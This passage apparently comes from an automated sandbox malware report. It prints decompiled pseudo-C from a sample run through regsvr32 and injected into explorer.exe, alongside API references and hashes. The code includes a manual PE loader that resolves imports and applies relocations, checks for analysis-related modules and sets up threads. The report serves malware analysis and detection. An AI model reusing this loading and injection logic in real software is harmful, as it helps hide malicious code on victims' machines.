						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x1820590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x1820590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x1820590
						_t22 = _t133 + 0x114; // 0x18206a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x1820590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x189fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x189fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x1820590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x189faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x1820590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x1820590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x1820590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x1820590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x189faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x1820590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x1820590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x189faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x1820590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x1820590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x1820590
								_t117 = _t331 + 0x228; // 0x18207b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(01820158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(01820368,00000105), ref: 10005283

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x189faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x189faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x189faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x189faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3016 Parent PID: 2936 explorer.exeCOMMON

Executed Functions

Function 000C5A61, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
				E000C5631(_t6, _t7); // executed
				return 0;
			}

0x000c5a61
0x000c5a6d
0x000c5a73
0x000c5a7a

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612

Uniqueness

Uniqueness Score: -1.00%

Function 000C4A0B, Relevance: 10.8, APIs: 7, Instructions: 285
stringpipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
